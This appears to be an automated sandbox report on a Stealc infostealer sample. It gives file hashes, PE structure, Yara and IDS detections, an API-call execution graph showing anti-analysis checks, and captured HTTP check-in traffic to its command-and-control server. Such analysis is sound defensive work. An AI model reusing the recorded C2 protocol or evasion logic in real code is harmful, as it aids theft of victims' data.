                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:1'812'480 bytes
                                  MD5:2ddf913f1bfac8e658b52ccbd75e8c80
                                  SHA1:f1d0732f7ba49cd0dfee3ea084020e5b75c7ed22
                                  SHA256:8de92a481031783cdc05d07776627e2294dcb823399b3887e60ce461ff1ecad7
                                  SHA512:ea477fa4c312b5e62aaefde99fd4b647f5f85c60c5c46341986bcd4a8323a5475cc859a3e6eca304a87c1f122176111a64f6c20803cae232566c63232378d0b0
                                  SSDEEP:49152:PNb0xqGv8NYVthpnAekJ++BwSJ246vETXL/f9:p0xq3grH22SJr/b/
                                  TLSH:A78533E3DEA02B2AE22DC13212DBC36A6ABC42404DDB55EC73854EF58C737D9345749A
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                                  File Icon

                                  Icon Hash:90cececece8e8eb0

                                  Static PE Info

                                  General

                                  Entrypoint:0xa97000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Entrypoint Preview

                                  Instruction
                                  jmp 00007FEA18BB3EEAh
                                  jbe 00007FEA18BB3F01h
                                  add byte ptr [eax], al
                                  jmp 00007FEA18BB5EE5h
                                  add byte ptr [ecx], al
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add ecx, dword ptr [edx]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  pop ds
                                  add byte ptr [eax+000000FEh], ah
                                  add byte ptr [edx], ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [ecx], cl
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add al, 0Ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], cl
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add dword ptr [eax+00000000h], eax
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add ecx, dword ptr [edx]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add dword ptr [eax], eax
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  or byte ptr [eax+00000000h], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add cl, byte ptr [edx]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  mov byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Rich Headers

                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x2490000x16200922b22f36999921dce16911bd94bc0fdunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x24a0000x2b00x2004fd86bfbe5ecd32ab317ab6b1dd0abdbFalse0.80078125data6.0887747060946245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x24c0000x2a90000x2002ff93c1d5f52e2ba65615aebc546723eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  imljxmgr0x4f50000x1a10000x1a0a00e4b7e0823944f199267f81fde77c5d71False0.9949059359060906data7.953583121368327IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  joqxgqti0x6960000x10000x400d9a3a3ec1963f95e196e1a835f9507adFalse0.751953125data5.856940687065921IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0x6970000x30000x220029cd190f377371de6cad818282149481False0.08720128676470588DOS executable (COM)1.1825617174316978IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_MANIFEST0x6957300x256ASCII text, with CRLF line terminators0.5100334448160535

                                  Imports

                                  DLLImport
                                  kernel32.dlllstrcpy

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-11-23T19:01:04.913259+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 23, 2024 19:01:02.891042948 CET4973080192.168.2.4185.215.113.206
                                  Nov 23, 2024 19:01:03.013190031 CET8049730185.215.113.206192.168.2.4
                                  Nov 23, 2024 19:01:03.013273954 CET4973080192.168.2.4185.215.113.206
                                  Nov 23, 2024 19:01:03.013803959 CET4973080192.168.2.4185.215.113.206
                                  Nov 23, 2024 19:01:03.133266926 CET8049730185.215.113.206192.168.2.4
                                  Nov 23, 2024 19:01:04.459232092 CET8049730185.215.113.206192.168.2.4
                                  Nov 23, 2024 19:01:04.459372044 CET4973080192.168.2.4185.215.113.206
                                  Nov 23, 2024 19:01:04.462304115 CET4973080192.168.2.4185.215.113.206
                                  Nov 23, 2024 19:01:04.582087994 CET8049730185.215.113.206192.168.2.4
                                  Nov 23, 2024 19:01:04.913139105 CET8049730185.215.113.206192.168.2.4
                                  Nov 23, 2024 19:01:04.913259029 CET4973080192.168.2.4185.215.113.206
                                  Nov 23, 2024 19:01:08.789376974 CET4973080192.168.2.4185.215.113.206

                                  HTTP Request Dependency Graph

                                  • 185.215.113.206

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.449730185.215.113.206806640C:\Users\user\Desktop\file.exe
                                  TimestampBytes transferredDirectionData
                                  Nov 23, 2024 19:01:03.013803959 CET90OUTGET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Nov 23, 2024 19:01:04.459232092 CET203INHTTP/1.1 200 OK
                                  Date: Sat, 23 Nov 2024 18:01:04 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Nov 23, 2024 19:01:04.462304115 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKEC
                                  Host: 185.215.113.206
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 38 32 43 31 33 37 44 44 30 43 33 38 38 36 35 38 32 35 34 38 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 2d 2d 0d 0a
                                  Data Ascii: ------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="hwid"1882C137DD0C3886582548------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="build"mars------IIEHJKJJJECFHJJJKKEC--
                                  Nov 23, 2024 19:01:04.913139105 CET210INHTTP/1.1 200 OK
                                  Date: Sat, 23 Nov 2024 18:01:04 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:13:00:59
                                  Start date:23/11/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0xf60000
                                  File size:1'812'480 bytes
                                  MD5 hash:2DDF913F1BFAC8E658B52CCBD75E8C80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1683174782.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1738692638.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:4.8%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:16.4%
                                    Total number of Nodes:1406
                                    Total number of Limit Nodes:28
                                    execution_graph 27178 f74c77 295 API calls 25730 f81bf0 25782 f62a90 25730->25782 25734 f81c03 25735 f81c29 lstrcpy 25734->25735 25736 f81c35 25734->25736 25735->25736 25737 f81c6d GetSystemInfo 25736->25737 25738 f81c65 ExitProcess 25736->25738 25739 f81c7d ExitProcess 25737->25739 25740 f81c85 25737->25740 25883 f61030 GetCurrentProcess VirtualAllocExNuma 25740->25883 25745 f81cb8 25895 f82ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25745->25895 25746 f81ca2 25746->25745 25747 f81cb0 ExitProcess 25746->25747 25749 f81cbd 25750 f81ce7 lstrlen 25749->25750 26104 f82a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25749->26104 25752 f81cff 25750->25752 25753 f81d23 lstrlen 25752->25753 25756 f81d13 lstrcpy lstrcat 25752->25756 25755 f81d39 25753->25755 25754 f81cd1 25754->25750 25757 f81ce0 ExitProcess 25754->25757 25758 f81d5a 25755->25758 25759 f81d46 lstrcpy lstrcat 25755->25759 25756->25753 25760 f82ad0 3 API calls 25758->25760 25759->25758 25761 f81d5f lstrlen 25760->25761 25764 f81d74 25761->25764 25762 f81d9a lstrlen 25763 f81db0 25762->25763 25766 f81dce 25763->25766 25767 f81dba lstrcpy lstrcat 25763->25767 25764->25762 25765 f81d87 lstrcpy lstrcat 25764->25765 25765->25762 25897 f82a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25766->25897 25767->25766 25769 f81dd3 lstrlen 25770 f81de7 25769->25770 25771 f81df7 lstrcpy lstrcat 25770->25771 25772 f81e0a 25770->25772 25771->25772 25773 f81e28 lstrcpy 25772->25773 25774 f81e30 25772->25774 25773->25774 25775 f81e56 OpenEventA 25774->25775 25776 f81e68 CloseHandle Sleep OpenEventA 25775->25776 25777 f81e8c CreateEventA 25775->25777 25776->25776 25776->25777 25898 f81b20 GetSystemTime 25777->25898 25781 f81ea5 CloseHandle ExitProcess 26105 f64a60 25782->26105 25784 f62aa1 25785 f64a60 2 API calls 25784->25785 25786 f62ab7 25785->25786 25787 f64a60 2 API calls 25786->25787 25788 f62acd 25787->25788 25789 f64a60 2 API calls 25788->25789 25790 f62ae3 25789->25790 25791 f64a60 2 API calls 25790->25791 25792 f62af9 25791->25792 25793 f64a60 2 API calls 25792->25793 25794 f62b0f 25793->25794 25795 f64a60 2 API calls 25794->25795 25796 f62b28 25795->25796 25797 f64a60 2 API calls 25796->25797 25798 f62b3e 25797->25798 25799 f64a60 2 API calls 25798->25799 25800 f62b54 25799->25800 25801 f64a60 2 API calls 25800->25801 25802 f62b6a 25801->25802 25803 f64a60 2 API calls 25802->25803 25804 f62b80 25803->25804 25805 f64a60 2 API calls 25804->25805 25806 f62b96 25805->25806 25807 f64a60 2 API calls 25806->25807 25808 f62baf 25807->25808 25809 f64a60 2 API calls 25808->25809 25810 f62bc5 25809->25810 25811 f64a60 2 API calls 25810->25811 25812 f62bdb 25811->25812 25813 f64a60 2 API calls 25812->25813 25814 f62bf1 25813->25814 25815 f64a60 2 API calls 25814->25815 25816 f62c07 25815->25816 25817 f64a60 2 API calls 25816->25817 25818 f62c1d 25817->25818 25819 f64a60 2 API calls 25818->25819 25820 f62c36 25819->25820 25821 f64a60 2 API calls 25820->25821 25822 f62c4c 25821->25822 25823 f64a60 2 API calls 25822->25823 25824 f62c62 25823->25824 25825 f64a60 2 API calls 25824->25825 25826 f62c78 25825->25826 25827 f64a60 2 API calls 25826->25827 25828 f62c8e 25827->25828 25829 f64a60 2 API calls 25828->25829 25830 f62ca4 25829->25830 25831 f64a60 2 API calls 25830->25831 25832 f62cbd 25831->25832 25833 f64a60 2 API calls 25832->25833 25834 f62cd3 25833->25834 25835 f64a60 2 API calls 25834->25835 25836 f62ce9 25835->25836 25837 f64a60 2 API calls 25836->25837 25838 f62cff 25837->25838 25839 f64a60 2 API calls 25838->25839 25840 f62d15 25839->25840 25841 f64a60 2 API calls 25840->25841 25842 f62d2b 25841->25842 25843 f64a60 2 API calls 25842->25843 25844 f62d44 25843->25844 25845 f64a60 2 API calls 25844->25845 25846 f62d5a 25845->25846 25847 f64a60 2 API calls 25846->25847 25848 f62d70 25847->25848 25849 f64a60 2 API calls 25848->25849 25850 f62d86 25849->25850 25851 f64a60 2 API calls 25850->25851 25852 f62d9c 25851->25852 25853 f64a60 2 API calls 25852->25853 25854 f62db2 25853->25854 25855 f64a60 2 API calls 25854->25855 25856 f62dcb 25855->25856 25857 f64a60 2 API calls 25856->25857 25858 f62de1 25857->25858 25859 f64a60 2 API calls 25858->25859 25860 f62df7 25859->25860 25861 f64a60 2 API calls 25860->25861 25862 f62e0d 25861->25862 25863 f64a60 2 API calls 25862->25863 25864 f62e23 25863->25864 25865 f64a60 2 API calls 25864->25865 25866 f62e39 25865->25866 25867 f64a60 2 API calls 25866->25867 25868 f62e52 25867->25868 25869 f86390 GetPEB 25868->25869 25870 f865c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 25869->25870 25873 f863c3 25869->25873 25871 f86638 25870->25871 25872 f86625 GetProcAddress 25870->25872 25874 f8666c 25871->25874 25875 f86641 GetProcAddress GetProcAddress 25871->25875 25872->25871 25878 f863d7 20 API calls 25873->25878 25876 f86688 25874->25876 25877 f86675 GetProcAddress 25874->25877 25875->25874 25879 f86691 GetProcAddress 25876->25879 25880 f866a4 25876->25880 25877->25876 25878->25870 25879->25880 25881 f866ad GetProcAddress GetProcAddress 25880->25881 25882 f866d7 25880->25882 25881->25882 25882->25734 25884 f61057 ExitProcess 25883->25884 25885 f6105e VirtualAlloc 25883->25885 25886 f6107d 25885->25886 25887 f610b1 25886->25887 25888 f6108a VirtualFree 25886->25888 25889 f610c0 25887->25889 25888->25887 25890 f610d0 GlobalMemoryStatusEx 25889->25890 25892 f610f5 25890->25892 25893 f61112 ExitProcess 25890->25893 25892->25893 25894 f6111a GetUserDefaultLangID 25892->25894 25894->25745 25894->25746 25896 f82b24 25895->25896 25896->25749 25897->25769 26110 f81820 25898->26110 25900 f81b81 sscanf 26149 f62a20 25900->26149 25903 f81be9 25906 f7ffd0 25903->25906 25904 f81bd6 25904->25903 25905 f81be2 ExitProcess 25904->25905 25907 f7ffe0 25906->25907 25908 f80019 lstrlen 25907->25908 25909 f8000d lstrcpy 25907->25909 25910 f800d0 25908->25910 25909->25908 25911 f800db lstrcpy 25910->25911 25912 f800e7 lstrlen 25910->25912 25911->25912 25913 f800ff 25912->25913 25914 f8010a lstrcpy 25913->25914 25915 f80116 lstrlen 25913->25915 25914->25915 25916 f8012e 25915->25916 25917 f80139 lstrcpy 25916->25917 25918 f80145 25916->25918 25917->25918 26151 f81570 25918->26151 25921 f8016e 25922 f8018f lstrlen 25921->25922 25923 f80183 lstrcpy 25921->25923 25924 f801a8 25922->25924 25923->25922 25925 f801c9 lstrlen 25924->25925 25926 f801bd lstrcpy 25924->25926 25927 f801e8 25925->25927 25926->25925 25928 f8020c lstrlen 25927->25928 25929 f80200 lstrcpy 25927->25929 25930 f8026a 25928->25930 25929->25928 25931 f80282 lstrcpy 25930->25931 25932 f8028e 25930->25932 25931->25932 26161 f62e70 25932->26161 25940 f80540 25941 f81570 4 API calls 25940->25941 25942 f8054f 25941->25942 25943 f805a1 lstrlen 25942->25943 25944 f80599 lstrcpy 25942->25944 25945 f805bf 25943->25945 25944->25943 25946 f805d1 lstrcpy lstrcat 25945->25946 25947 f805e9 25945->25947 25946->25947 25948 f80614 25947->25948 25949 f8060c lstrcpy 25947->25949 25950 f8061b lstrlen 25948->25950 25949->25948 25951 f80636 25950->25951 25952 f8064a lstrcpy lstrcat 25951->25952 25953 f80662 25951->25953 25952->25953 25954 f80687 25953->25954 25955 f8067f lstrcpy 25953->25955 25956 f8068e lstrlen 25954->25956 25955->25954 25957 f806b3 25956->25957 25958 f806c7 lstrcpy lstrcat 25957->25958 25959 f806db 25957->25959 25958->25959 25960 f80704 lstrcpy 25959->25960 25961 f8070c 25959->25961 25960->25961 25962 f80749 lstrcpy 25961->25962 25963 f80751 25961->25963 25962->25963 26917 f82740 GetWindowsDirectoryA 25963->26917 25965 f80785 26926 f64c50 25965->26926 25966 f8075d 25966->25965 25967 f8077d lstrcpy 25966->25967 25967->25965 25969 f8078f 27080 f78ca0 StrCmpCA 25969->27080 25971 f8079b 25972 f61530 8 API calls 25971->25972 25973 f807bc 25972->25973 25974 f807ed 25973->25974 25975 f807e5 lstrcpy 25973->25975 27098 f660d0 80 API calls 25974->27098 25975->25974 25977 f807fa 27099 f781b0 10 API calls 25977->27099 25979 f80809 25980 f61530 8 API calls 25979->25980 25981 f8082f 25980->25981 25982 f8085e 25981->25982 25983 f80856 lstrcpy 25981->25983 27100 f660d0 80 API calls 25982->27100 25983->25982 25985 f8086b 27101 f77ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 25985->27101 25987 f80876 25988 f61530 8 API calls 25987->25988 25989 f808a1 25988->25989 25990 f808c9 lstrcpy 25989->25990 25991 f808d5 25989->25991 25990->25991 27102 f660d0 80 API calls 25991->27102 25993 f808db 27103 f78050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 25993->27103 25995 f808e6 25996 f61530 8 API calls 25995->25996 25997 f808f7 25996->25997 25998 f8092e 25997->25998 25999 f80926 lstrcpy 25997->25999 27104 f65640 8 API calls 25998->27104 25999->25998 26001 f80933 26002 f61530 8 API calls 26001->26002 26003 f8094c 26002->26003 27105 f77280 1499 API calls 26003->27105 26005 f8099f 26006 f61530 8 API calls 26005->26006 26007 f809cf 26006->26007 26008 f809fe 26007->26008 26009 f809f6 lstrcpy 26007->26009 27106 f660d0 80 API calls 26008->27106 26009->26008 26011 f80a0b 27107 f783e0 7 API calls 26011->27107 26013 f80a18 26014 f61530 8 API calls 26013->26014 26015 f80a29 26014->26015 27108 f624e0 230 API calls 26015->27108 26017 f80a6b 26018 f80a7f 26017->26018 26019 f80b40 26017->26019 26021 f61530 8 API calls 26018->26021 26020 f61530 8 API calls 26019->26020 26023 f80b59 26020->26023 26022 f80aa5 26021->26022 26025 f80acc lstrcpy 26022->26025 26026 f80ad4 26022->26026 26024 f80b87 26023->26024 26027 f80b7f lstrcpy 26023->26027 27112 f660d0 80 API calls 26024->27112 26025->26026 27109 f660d0 80 API calls 26026->27109 26027->26024 26030 f80b8d 27113 f7c840 70 API calls 26030->27113 26031 f80ada 27110 f785b0 47 API calls 26031->27110 26034 f80b38 26037 f80bd1 26034->26037 26040 f61530 8 API calls 26034->26040 26035 f80ae5 26036 f61530 8 API calls 26035->26036 26039 f80af6 26036->26039 26038 f80bfa 26037->26038 26041 f61530 8 API calls 26037->26041 26042 f80c23 26038->26042 26047 f61530 8 API calls 26038->26047 27111 f7d0f0 118 API calls 26039->27111 26044 f80bb9 26040->26044 26046 f80bf5 26041->26046 26045 f80c4c 26042->26045 26050 f61530 8 API calls 26042->26050 27114 f7d7b0 103 API calls __crtGetStringTypeA_stat 26044->27114 26051 f80c75 26045->26051 26056 f61530 8 API calls 26045->26056 27116 f7dfa0 149 API calls 26046->27116 26053 f80c1e 26047->26053 26049 f80bbe 26054 f61530 8 API calls 26049->26054 26055 f80c47 26050->26055 26057 f80c9e 26051->26057 26063 f61530 8 API calls 26051->26063 27117 f7e500 108 API calls 26053->27117 26059 f80bcc 26054->26059 27118 f7e720 120 API calls 26055->27118 26062 f80c70 26056->26062 26060 f80cc7 26057->26060 26066 f61530 8 API calls 26057->26066 27115 f7ecb0 99 API calls 26059->27115 26067 f80cf0 26060->26067 26073 f61530 8 API calls 26060->26073 27119 f7e9e0 110 API calls 26062->27119 26064 f80c99 26063->26064 27120 f67bc0 155 API calls 26064->27120 26072 f80cc2 26066->26072 26069 f80dca 26067->26069 26070 f80d04 26067->26070 26075 f61530 8 API calls 26069->26075 26074 f61530 8 API calls 26070->26074 27121 f7eb70 108 API calls 26072->27121 26077 f80ceb 26073->26077 26079 f80d2a 26074->26079 26080 f80de3 26075->26080 27122 f841e0 91 API calls 26077->27122 26082 f80d5e 26079->26082 26083 f80d56 lstrcpy 26079->26083 26081 f80e11 26080->26081 26084 f80e09 lstrcpy 26080->26084 27126 f660d0 80 API calls 26081->27126 27123 f660d0 80 API calls 26082->27123 26083->26082 26084->26081 26087 f80e17 27127 f7c840 70 API calls 26087->27127 26088 f80d64 27124 f785b0 47 API calls 26088->27124 26091 f80dc2 26094 f61530 8 API calls 26091->26094 26092 f80d6f 26093 f61530 8 API calls 26092->26093 26095 f80d80 26093->26095 26097 f80e39 26094->26097 27125 f7d0f0 118 API calls 26095->27125 26098 f80e67 26097->26098 26099 f80e5f lstrcpy 26097->26099 27128 f660d0 80 API calls 26098->27128 26099->26098 26101 f80e74 26103 f80e95 26101->26103 27129 f81660 12 API calls 26101->27129 26103->25781 26104->25754 26106 f64a76 RtlAllocateHeap 26105->26106 26109 f64ab4 VirtualProtect 26106->26109 26109->25784 26111 f8182e 26110->26111 26112 f81849 lstrcpy 26111->26112 26113 f81855 lstrlen 26111->26113 26112->26113 26114 f81873 26113->26114 26115 f81885 lstrcpy lstrcat 26114->26115 26116 f81898 26114->26116 26115->26116 26117 f818c7 26116->26117 26118 f818bf lstrcpy 26116->26118 26119 f818ce lstrlen 26117->26119 26118->26117 26120 f818e6 26119->26120 26121 f818f2 lstrcpy lstrcat 26120->26121 26122 f81906 26120->26122 26121->26122 26123 f81935 26122->26123 26124 f8192d lstrcpy 26122->26124 26125 f8193c lstrlen 26123->26125 26124->26123 26126 f81958 26125->26126 26127 f8196a lstrcpy lstrcat 26126->26127 26128 f8197d 26126->26128 26127->26128 26129 f819ac 26128->26129 26130 f819a4 lstrcpy 26128->26130 26131 f819b3 lstrlen 26129->26131 26130->26129 26132 f819cb 26131->26132 26133 f819d7 lstrcpy lstrcat 26132->26133 26134 f819eb 26132->26134 26133->26134 26135 f81a1a 26134->26135 26136 f81a12 lstrcpy 26134->26136 26137 f81a21 lstrlen 26135->26137 26136->26135 26138 f81a3d 26137->26138 26139 f81a4f lstrcpy lstrcat 26138->26139 26140 f81a62 26138->26140 26139->26140 26141 f81a91 26140->26141 26142 f81a89 lstrcpy 26140->26142 26143 f81a98 lstrlen 26141->26143 26142->26141 26144 f81ab4 26143->26144 26145 f81ac6 lstrcpy lstrcat 26144->26145 26146 f81ad9 26144->26146 26145->26146 26147 f81b08 26146->26147 26148 f81b00 lstrcpy 26146->26148 26147->25900 26148->26147 26150 f62a24 SystemTimeToFileTime SystemTimeToFileTime 26149->26150 26150->25903 26150->25904 26152 f8157f 26151->26152 26153 f8159f lstrcpy 26152->26153 26154 f815a7 26152->26154 26153->26154 26155 f815d7 lstrcpy 26154->26155 26156 f815df 26154->26156 26155->26156 26157 f8160f lstrcpy 26156->26157 26158 f81617 26156->26158 26157->26158 26159 f80155 lstrlen 26158->26159 26160 f81647 lstrcpy 26158->26160 26159->25921 26160->26159 26162 f64a60 2 API calls 26161->26162 26163 f62e82 26162->26163 26164 f64a60 2 API calls 26163->26164 26165 f62ea0 26164->26165 26166 f64a60 2 API calls 26165->26166 26167 f62eb6 26166->26167 26168 f64a60 2 API calls 26167->26168 26169 f62ecb 26168->26169 26170 f64a60 2 API calls 26169->26170 26171 f62eec 26170->26171 26172 f64a60 2 API calls 26171->26172 26173 f62f01 26172->26173 26174 f64a60 2 API calls 26173->26174 26175 f62f19 26174->26175 26176 f64a60 2 API calls 26175->26176 26177 f62f3a 26176->26177 26178 f64a60 2 API calls 26177->26178 26179 f62f4f 26178->26179 26180 f64a60 2 API calls 26179->26180 26181 f62f65 26180->26181 26182 f64a60 2 API calls 26181->26182 26183 f62f7b 26182->26183 26184 f64a60 2 API calls 26183->26184 26185 f62f91 26184->26185 26186 f64a60 2 API calls 26185->26186 26187 f62faa 26186->26187 26188 f64a60 2 API calls 26187->26188 26189 f62fc0 